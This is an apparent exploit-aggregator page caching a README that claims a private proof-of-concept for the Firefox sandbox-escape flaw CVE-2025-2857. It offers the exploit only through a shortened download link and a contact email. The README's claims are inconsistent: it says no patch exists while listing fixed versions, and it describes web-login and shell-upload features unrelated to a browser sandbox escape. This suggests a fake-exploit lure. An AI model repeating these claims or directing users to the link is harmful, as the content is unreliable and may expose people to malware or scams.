Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-2857 PoC — Mozilla Firefox和Mozilla Firefox ESR 安全漏洞

Source
Associated Vulnerability
Title:Mozilla Firefox和Mozilla Firefox ESR 安全漏洞 (CVE-2025-2857)
Description:Mozilla Firefox和Mozilla Firefox ESR都是美国Mozilla基金会的产品。Mozilla Firefox是一款开源Web浏览器。Mozilla Firefox ESR是Firefox(Web浏览器)的一个延长支持版本。 Mozilla Firefox 136.0.4之前版本和Mozilla Firefox ESR 128.8.1之前版本和115.21.1之前版本存在安全漏洞,该漏洞源于受损的子进程可能导致父进程返回意外强大的句柄,从而导致沙箱逃逸。
Readme
# CVE-2025-2857

## 📖Overview
A sandbox escape vulnerability in Firefox on Windows, discovered by Firefox developers. The vulnerability allows attackers to confuse the parent process into leaking handles into unprivileged child processes, potentially breaking the sandbox security model.

## Exploit:
## [Download here](https://tinyurl.com/nanhrvvy)
## Details
+ **CVE ID**: CVE-2025-2857
+ **Published**: 03/27/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **Patch Available:  (No official patch yet)**
+ **CVSS**: 10
## Impact
Critical severity vulnerability that enables attackers to potentially: - Escape the browser's sandbox protection - Execute arbitrary code - Compromise system integrity - Gain unauthorized access to system resources This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild.


## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.



## Contact
+ **For inquiries, please contact:doppler21@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/nanhrvvy)
File Snapshot

[4.0K] /data/pocs/1820f6e89b7a327335a6d8903c90169ee129b3ca └── [1.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.